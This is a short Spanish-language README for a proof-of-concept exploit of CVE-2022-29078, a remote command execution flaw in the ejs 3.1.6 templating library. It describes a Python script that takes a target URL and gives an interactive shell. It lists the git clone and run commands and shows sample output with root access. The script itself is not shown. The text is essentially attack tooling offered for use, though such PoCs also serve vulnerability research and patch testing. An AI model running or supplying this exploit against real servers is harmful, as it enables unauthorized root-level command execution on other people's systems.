
Prueba de concepto del exploit para CVE-2022-29078 (ejs 3.1.6) que permite la ejecución remota de comandos mediante un script de Python. Acepta una URL objetivo y proporciona un shell interactivo.
PoC simple para CVE-2022-29078 (vuln ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
Aparecerá un prompt para ejecutar comandos
$ id
uid=0(root) gid=0(root) groupes=0(root)